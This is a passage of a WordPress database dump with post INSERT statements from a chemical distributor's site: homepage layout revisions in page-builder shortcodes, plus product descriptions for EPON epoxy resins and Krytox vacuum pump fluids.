id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-27 18:29:53', '2016-08-27 18:29:53', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (933, 1, '2016-08-27 18:32:39', '2016-08-27 18:32:39', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="chemicals/release-agents/" height="240px" bg="86"  target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="chemicals/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-27 18:32:39', '2016-08-27 18:32:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (934, 1, '2016-08-27 18:35:46', '2016-08-27 18:35:46', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="chemicals/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-27 18:35:46', '2016-08-27 18:35:46', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (935, 1, '2016-08-27 18:37:35', '2016-08-27 18:37:35', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" ]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="chemicals/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-27 18:37:35', '2016-08-27 18:37:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (936, 1, '2016-08-27 18:43:21', '2016-08-27 18:43:21', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="chemicals/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-27 18:43:21', '2016-08-27 18:43:21', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (937, 3, '2016-08-29 12:53:32', '2016-08-29 12:53:32', '', 'EPON™ 1002F', 'EPON™ Resin 1002F is a solid epoxy resin derived from a liquid epoxy resin and bisphenol-A. This epoxy resin finds application in solution type coatings, as an intermediate in the preparation of epoxy esters, high performance hot melt adhesives, molding powders, and in powder coatings. Benefits include:\r\n<ul>\r\n 	<li>Can be formulated into high performance amine or polyamide cured coatings.</li>\r\n 	<li>Exhibits unique melt viscosity for hot melt adhesives.</li>\r\n 	<li>Displays a desirable reactivity, rheology and electrical properties in powder coatings.</li>\r\n 	<li>This resin will not “block” or sinter even at slightly elevated storage temperatures.</li>\r\n 	<li>Filtered during manufacture so final product is very clean.</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-1002f', '', '', '2016-09-21 14:52:01', '2016-09-21 14:52:01', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=937', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (938, 3, '2016-08-29 12:52:50', '2016-08-29 12:52:50', '', '1002F', '', 'inherit', 'open', 'closed', '', '1002f', '', '', '2016-08-29 12:52:50', '2016-08-29 12:52:50', '', 937, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1002F.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (939, 3, '2016-08-29 12:56:58', '2016-08-29 12:56:58', '', 'EPON™ 1004F', 'EPON™ Resin 1004F is a solid epoxy resin derived from bisphenol-A and epichlorohydrin. This medium molecular weight epoxy resin has an average of 4.5-5.0 hydroxyl groups per molecule plus the terminal epoxy groups. These epoxy and hydroxyl groups are usually reacted with vegetable oil acids to prepare epoxy resin esters. Epoxy esters derived from EPON Resin 1004F find application as vehicles in appliance primers, automotive primers, and in maintenance coatings. EPON Resin 1004F may be used as a partial replacement for other EPON Resins in amine or polyamide cured epoxy air dry finishes and in phenolic and amino modified epoxy baking systems. Benefits include:\r\n<ul>\r\n 	<li>EPON Resin 1004F contains a specific amount of esterification catalyst to control esterification reactions\r\nwith vegetable oil acids.</li>\r\n 	<li>EPON Resin 1004F is supplied in very large lots (greater than 100M pounds) with uniform properties.</li>\r\n 	<li>EPON Resin 1004F provides special solution viscosity and reactivity properties when combined with other EPON Resins in air dry amine or polyamide cured epoxy coatings and in epoxy-phenolic or amino converted baking systems.</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-1004f', '', '', '2016-09-21 14:52:56', '2016-09-21 14:52:56', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=939', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (940, 3, '2016-08-29 12:56:17', '2016-08-29 12:56:17', '', '1004F', '', 'inherit', 'open', 'closed', '', '1004f', '', '', '2016-08-29 12:56:17', '2016-08-29 12:56:17', '', 939, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1004F.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (941, 3, '2016-08-29 14:27:38', '2016-08-29 14:27:38', '', 'EPON™ 1007F', 'EPON™ Resin 1007F is a moderately high molecular weight solid epoxy resin derived from a liquid epoxy\r\nresin and bisphenol-A. This resin is used extensively as a vehicle in high performance industrial baking finishes. In these coatings the EPON Resin 1007F is usually reacted with urea formaldehyde or phenolformaldehyde resins to develop the desired film properties. Coatings of this type exhibit outstanding flexibility and adhesion as well as exceptional resistance to chemicals and solvents. Some of the more important applications for EPON Resin 1007F/urea-formaldehyde or phenol formaldehyde coatings are linings for metal containers, appliance primers, metal furniture finishes and clear coatings for brass. Benefits include:\r\n<ul>\r\n 	<li>This resin is extremely clean. It is substantially free from extraneous materials, rendering it suitable in certain powder coating applications.</li>\r\n 	<li>This product imparts unique melt viscosity characteristics to hot melt adhesives, molding powders, and powder coatings.</li>\r\n 	<li>EPON Resin 1007F provides special solution viscosity and reactivity properties when combined with other EPON Resins in air dry amine or polyamide cured coatings.</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-1007f', '', '', '2016-09-21 14:54:01', '2016-09-21 14:54:01', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=941', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (943, 2, '2016-08-29 13:12:54', '2016-08-29 13:12:54', 'Krytox VPF 1506, vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox™ fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox™ superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide low vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\r\n\r\nWhile Krytox VPF 1506 fluids are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox™ XP products have not been tested with all materials. Initial testing has shown no problems with Teflon™ fluoroplastic resin, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. The performance of the soluble additives could degrade at temperatures more than 182 °C (360 °F) over a long period of time.\r\n\r\n<strong>High Vacuum Grease</strong>\r\nKrytox LVP is a high vacuum grease formulated with a special low vapor pressure Krytox oil for high-vacuum applications. It is also useful for sealing laboratory glassware connections and as a thread lubricant/sealant.', 'VPF 1506', 'Krytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems.\r\n<br /><br />\r\nViscosity varies per grade. 1506 is the least viscous.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-vpf-1506', '', '', '2016-10-05 12:43:51', '2016-10-05 12:43:51', '', 0, 'https://132.148.10.86/wordpress/shop/krytox/krytox-lubricants/vpf/1506-copy/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (944, 2, '2016-08-29 13:50:06', '2016-08-29 13:50:06', 'Krytox VPF 1514, vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox™ fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox™ superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide low vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\r\n\r\nWhile Krytox VPF 1514 fluids are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox™ XP products have not been tested with all materials. 